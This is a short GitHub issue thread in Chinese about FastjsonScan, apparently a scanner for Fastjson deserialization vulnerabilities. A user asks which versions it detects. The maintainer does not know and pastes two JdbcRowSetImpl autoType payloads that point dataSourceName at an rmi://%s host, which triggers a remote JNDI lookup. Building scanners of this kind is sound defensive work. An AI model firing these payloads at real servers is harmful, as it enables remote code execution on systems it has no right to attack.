### ISSUE TITLE
可以检测到那个版本

### ISSUE THREAD

**Issue by wealaa** [Maskhe/FastjsonScan#3]
大佬你好，请问这个可以检测到那个版本

**Comment by Maskhe** [comment]
害，我也忘了覆盖到哪个版本了，payload在代码里有：
`{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"is\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://%s/aaa\",\"autoCommit\":true}}`

`{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\",\"dataSourceName\":\"rmi://%s/aaa\",\"autoCommit\":true}`
